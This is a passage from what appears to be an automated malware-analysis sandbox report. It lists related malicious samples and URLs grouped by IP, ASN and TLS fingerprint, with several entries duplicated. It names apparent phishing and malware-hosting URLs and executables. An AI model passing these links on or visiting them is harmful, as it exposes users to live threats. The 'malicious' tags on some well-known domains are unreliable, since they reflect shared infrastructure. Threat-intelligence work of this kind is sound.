              https://drive.google.com/uc?export=download&id=1QwhJnu-bYB73eWYRaGC_EuhkzqVSA20NGet hashmaliciousBrowse
              • 172.217.23.225
              https://drive.google.com/uc?export=download&id=1BZyO3k5sA4YaOJQDXxp2A3tfsIJBJP_-Get hashmaliciousBrowse
              • 172.217.23.193
              https://www.dropbox.com/s/4yh0zci0kay8ilk/TT%20%20Receipt%20DC.tbz2?dl=1Get hashmaliciousBrowse
              • 172.217.23.193
              Court-Order-Form-2761810.docGet hashmaliciousBrowse
              • 172.217.23.225

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              unknownhttps://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https%3A%2F%2Fu15183222.ct.sendgrid.net%2Fwf%2Fopen%3Fupn%3DV-2FUUiW5KvBPNV-2FItFYsbuBa0SAW-2BdodcPiIb0tKgPse5Msb6NYFlPAJvdCZuYpe1fkThYhSTER8bVjxjayQWF5c7nr-2FLOyjZS808lP9FRXHiFxtYL7EDTUc7Vj4-2Fa-2F9C6sfGDt5-2FjfuGrMmy3ln39oepoTeOqfZT2g1BIoej0Vl3P3jSTNgVVgx7EJfGKirAoZDIFZ9LBsGFPcgQWPkFGjfe7yDNgPGmxlAO98hRgAEK-2FDr4oKMg9KJpAthxA-2BKSjln00vva1c7SBuvY1-2BD1rvm-2BLrPdmriPgXf8b5cz4KBAyhZMMggSHP9gx5m8nXE8Qj-2FSrw1vkdZloBjA1tU1EDt247FbMmpLnmlGBRMCf7EipoJNq3bfuXTrvTTNGV-2BnOW-2BgYs2o2ZSvaBQOoQadwFUYt7mcSsS3yYOA2MHbXfCPpm5UmM9j9ipczmIxpxJWZWzF4tCcj5ETbcSf-2FxPHP3jfn4-2BhYDLXlWKMmCjFo5vZykMfKvtR-2FSwKfdBevPRGicLUPvwNWoJvistlOtQWIALvZl8iZXOlzXMbFkwgYrxpUIScB1rhENzcAg9wsVjLjF32MxpyGPl3s3slMEvU-2Bb6a3ub9g9MH5P5ZJMYawHltDik7udBCOD1-2FPxe-2FVZ0lTIAozBaMyoZpNi6M-2FLkZIzncW0Z8aQw9eAdEXkgJXZI-3DGet hashmaliciousBrowse
              • 52.109.88.132
              https://mpress.ind.br/openview/shared.com.htmlGet hashmaliciousBrowse
              • 108.167.188.183
              SVClientSetup(3.3.2.17.0.1).exeGet hashmaliciousBrowse
              • 127.0.0.1
              https://www.julioutreras.cl/DOC/DOCUMENT.htmlGet hashmaliciousBrowse
              • 190.171.170.94
              setup.exeGet hashmaliciousBrowse
              • 104.18.56.51
              2.exeGet hashmaliciousBrowse
              • 91.208.184.78
              WindowsUpdate.exeGet hashmaliciousBrowse
              • 176.123.3.108
              Lab01-01_dll.dllGet hashmaliciousBrowse
              • 127.26.152.13
              BK2hq02nbO.apkGet hashmaliciousBrowse
              • 199.83.63.130
              https://aka.ms/vmsettingsGet hashmaliciousBrowse
              • 152.199.23.37
              https://aka.ms/vmsettingsGet hashmaliciousBrowse
              • 152.199.23.37
              awesomeapp.apkGet hashmaliciousBrowse
              • 173.194.76.188
              http://107.6.74.93/search?q=1Get hashmaliciousBrowse
              • 107.6.74.93
              https://gettheleadout.sharepoint.com/:u:/g/EZEYoA48c8xDtwpS_FxxlHEBpNT1BJjtMlCHY_Y_ARNaZw?e=TPpHt4Get hashmaliciousBrowse
              • 192.210.238.27
              http://reklambud.com/c/Quotes2083Get hashmaliciousBrowse
              • 91.239.232.41
              https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https%3A%2F%2Fu10534349.ct.sendgrid.net%2Fls%2Fclick%3Fupn%3D-2FbtVRd9V3LQUgEtjyb8YA5XmhEpbv4iLcVJ-2FGJhUgAfkEHt6B3RmIVNyFTABipTGkUFBuBHnG95MUsC0i9YMGNzzPvSDXmJpwr7fQsroe1GXyRN6JGXRt1V5rdZUHg1nUPf8avmHSg6g0d5KpN6Kd3gFFGzqkFijVEdqYia3cY1qaCD3fMzRUEejmVxIQXfQ0Kvr_ikc0R-2FOz4UQejsuOLNM1OL6q7Gk7uayIq07TEuMgZJMVAlgQBXWiX43y0HcrRUOJFtOcr86LTP-2F6yYNgd8upN0RzVnE2JBYvild3AaaJTgiNDjFutgPzjF0DL6bxZ-2FB46uiAaXqKwhLQnynk3uAodcU64L-2BkXDY4WHe-2F3xrJkjw8SwGa4SA5pyb3Kw4sfWSJ5P6mKMh8u8yx4W1RH2PJNaSVlNrhIWojXD4IIEy1pJQE8gMPjRlBPtu3jW4SaLyQGet hashmaliciousBrowse
              • 52.109.88.132
              31(yb-aia).zip - OneDrive.htmlGet hashmaliciousBrowse
              • 192.229.221.185
              http://185.143.221.85Get hashmaliciousBrowse
              • 185.143.221.85
              zAdPBr5vdQ.docGet hashmaliciousBrowse
              • 149.56.245.196
              zAdPBr5vdQ.docGet hashmaliciousBrowse
              • 149.56.245.196
              unknownhttps://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https%3A%2F%2Fu15183222.ct.sendgrid.net%2Fwf%2Fopen%3Fupn%3DV-2FUUiW5KvBPNV-2FItFYsbuBa0SAW-2BdodcPiIb0tKgPse5Msb6NYFlPAJvdCZuYpe1fkThYhSTER8bVjxjayQWF5c7nr-2FLOyjZS808lP9FRXHiFxtYL7EDTUc7Vj4-2Fa-2F9C6sfGDt5-2FjfuGrMmy3ln39oepoTeOqfZT2g1BIoej0Vl3P3jSTNgVVgx7EJfGKirAoZDIFZ9LBsGFPcgQWPkFGjfe7yDNgPGmxlAO98hRgAEK-2FDr4oKMg9KJpAthxA-2BKSjln00vva1c7SBuvY1-2BD1rvm-2BLrPdmriPgXf8b5cz4KBAyhZMMggSHP9gx5m8nXE8Qj-2FSrw1vkdZloBjA1tU1EDt247FbMmpLnmlGBRMCf7EipoJNq3bfuXTrvTTNGV-2BnOW-2BgYs2o2ZSvaBQOoQadwFUYt7mcSsS3yYOA2MHbXfCPpm5UmM9j9ipczmIxpxJWZWzF4tCcj5ETbcSf-2FxPHP3jfn4-2BhYDLXlWKMmCjFo5vZykMfKvtR-2FSwKfdBevPRGicLUPvwNWoJvistlOtQWIALvZl8iZXOlzXMbFkwgYrxpUIScB1rhENzcAg9wsVjLjF32MxpyGPl3s3slMEvU-2Bb6a3ub9g9MH5P5ZJMYawHltDik7udBCOD1-2FPxe-2FVZ0lTIAozBaMyoZpNi6M-2FLkZIzncW0Z8aQw9eAdEXkgJXZI-3DGet hashmaliciousBrowse
              • 52.109.88.132
              https://mpress.ind.br/openview/shared.com.htmlGet hashmaliciousBrowse
              • 108.167.188.183
              SVClientSetup(3.3.2.17.0.1).exeGet hashmaliciousBrowse
              • 127.0.0.1
              https://www.julioutreras.cl/DOC/DOCUMENT.htmlGet hashmaliciousBrowse
              • 190.171.170.94
              setup.exeGet hashmaliciousBrowse
              • 104.18.56.51
              2.exeGet hashmaliciousBrowse
              • 91.208.184.78
              WindowsUpdate.exeGet hashmaliciousBrowse
              • 176.123.3.108
              Lab01-01_dll.dllGet hashmaliciousBrowse
              • 127.26.152.13
              BK2hq02nbO.apkGet hashmaliciousBrowse
              • 199.83.63.130
              https://aka.ms/vmsettingsGet hashmaliciousBrowse
              • 152.199.23.37
              https://aka.ms/vmsettingsGet hashmaliciousBrowse
              • 152.199.23.37
              awesomeapp.apkGet hashmaliciousBrowse
              • 173.194.76.188
              http://107.6.74.93/search?q=1Get hashmaliciousBrowse
              • 107.6.74.93
              https://gettheleadout.sharepoint.com/:u:/g/EZEYoA48c8xDtwpS_FxxlHEBpNT1BJjtMlCHY_Y_ARNaZw?e=TPpHt4Get hashmaliciousBrowse
              • 192.210.238.27
              http://reklambud.com/c/Quotes2083Get hashmaliciousBrowse
              • 91.239.232.41
              https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https%3A%2F%2Fu10534349.ct.sendgrid.net%2Fls%2Fclick%3Fupn%3D-2FbtVRd9V3LQUgEtjyb8YA5XmhEpbv4iLcVJ-2FGJhUgAfkEHt6B3RmIVNyFTABipTGkUFBuBHnG95MUsC0i9YMGNzzPvSDXmJpwr7fQsroe1GXyRN6JGXRt1V5rdZUHg1nUPf8avmHSg6g0d5KpN6Kd3gFFGzqkFijVEdqYia3cY1qaCD3fMzRUEejmVxIQXfQ0Kvr_ikc0R-2FOz4UQejsuOLNM1OL6q7Gk7uayIq07TEuMgZJMVAlgQBXWiX43y0HcrRUOJFtOcr86LTP-2F6yYNgd8upN0RzVnE2JBYvild3AaaJTgiNDjFutgPzjF0DL6bxZ-2FB46uiAaXqKwhLQnynk3uAodcU64L-2BkXDY4WHe-2F3xrJkjw8SwGa4SA5pyb3Kw4sfWSJ5P6mKMh8u8yx4W1RH2PJNaSVlNrhIWojXD4IIEy1pJQE8gMPjRlBPtu3jW4SaLyQGet hashmaliciousBrowse
              • 52.109.88.132
              31(yb-aia).zip - OneDrive.htmlGet hashmaliciousBrowse
              • 192.229.221.185
              http://185.143.221.85Get hashmaliciousBrowse
              • 185.143.221.85
              zAdPBr5vdQ.docGet hashmaliciousBrowse
              • 149.56.245.196
              zAdPBr5vdQ.docGet hashmaliciousBrowse
              • 149.56.245.196

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              37f463bf4616ecd445d4a1937da06e19https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https%3A%2F%2Fu15183222.ct.sendgrid.net%2Fwf%2Fopen%3Fupn%3DV-2FUUiW5KvBPNV-2FItFYsbuBa0SAW-2BdodcPiIb0tKgPse5Msb6NYFlPAJvdCZuYpe1fkThYhSTER8bVjxjayQWF5c7nr-2FLOyjZS808lP9FRXHiFxtYL7EDTUc7Vj4-2Fa-2F9C6sfGDt5-2FjfuGrMmy3ln39oepoTeOqfZT2g1BIoej0Vl3P3jSTNgVVgx7EJfGKirAoZDIFZ9LBsGFPcgQWPkFGjfe7yDNgPGmxlAO98hRgAEK-2FDr4oKMg9KJpAthxA-2BKSjln00vva1c7SBuvY1-2BD1rvm-2BLrPdmriPgXf8b5cz4KBAyhZMMggSHP9gx5m8nXE8Qj-2FSrw1vkdZloBjA1tU1EDt247FbMmpLnmlGBRMCf7EipoJNq3bfuXTrvTTNGV-2BnOW-2BgYs2o2ZSvaBQOoQadwFUYt7mcSsS3yYOA2MHbXfCPpm5UmM9j9ipczmIxpxJWZWzF4tCcj5ETbcSf-2FxPHP3jfn4-2BhYDLXlWKMmCjFo5vZykMfKvtR-2FSwKfdBevPRGicLUPvwNWoJvistlOtQWIALvZl8iZXOlzXMbFkwgYrxpUIScB1rhENzcAg9wsVjLjF32MxpyGPl3s3slMEvU-2Bb6a3ub9g9MH5P5ZJMYawHltDik7udBCOD1-2FPxe-2FVZ0lTIAozBaMyoZpNi6M-2FLkZIzncW0Z8aQw9eAdEXkgJXZI-3DGet hashmaliciousBrowse
              • 216.58.207.65
              https://mpress.ind.br/openview/shared.com.htmlGet hashmaliciousBrowse
              • 216.58.207.65
              https://www.julioutreras.cl/DOC/DOCUMENT.htmlGet hashmaliciousBrowse
              • 216.58.207.65
              https://aka.ms/vmsettingsGet hashmaliciousBrowse
              • 216.58.207.65
              https://aka.ms/vmsettingsGet hashmaliciousBrowse
              • 216.58.207.65
              http://reklambud.com/c/Quotes2083Get hashmaliciousBrowse
              • 216.58.207.65
              Tax Challan .pdf .htmlGet hashmaliciousBrowse
              • 216.58.207.65
              Lab13-01.exeGet hashmaliciousBrowse
              • 216.58.207.65
              https://delphiadrives.buzz/Secureviewdocs/FBG/Get hashmaliciousBrowse
              • 216.58.207.65
              https://courseworktutors.com/re/index.php?email=rui.feteira@klc.ptGet hashmaliciousBrowse
              • 216.58.207.65
              http://d19b4k8ycsi5o2.cloudfront.net/d/?id=jHhgjdgd-JHShgfs-JHsgsh&p1=innodom53.com/man/alessandroa@herbalife.comGet hashmaliciousBrowse
              • 216.58.207.65
              https://jeffreyfielddesign.com/memo/PDFGet hashmaliciousBrowse
              • 216.58.207.65
              Shipping_Doc.htmlGet hashmaliciousBrowse
              • 216.58.207.65
              http://www.covid19.go.idGet hashmaliciousBrowse
              • 216.58.207.65
              CG2DjQo64E.exeGet hashmaliciousBrowse
              • 216.58.207.65
              Health-Ebook.exeGet hashmaliciousBrowse
              • 216.58.207.65
              https://mysslinsurance.com/1/2/3/Get hashmaliciousBrowse
              • 216.58.207.65
              #Ud83d#UdcdeLoyalistcollege.com NewVoice.htmlGet hashmaliciousBrowse
              • 216.58.207.65
              http://drcynthiand.ca/vm/?0@=?Z3JlZy5uZXdtYW5Ab3prLmNvbQ0=Get hashmaliciousBrowse
              • 216.58.207.65
              http://hafcointernational.com/.gkhlasdfd/Get hashmaliciousBrowse
              • 216.58.207.65

              Dropped Files

              No context

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.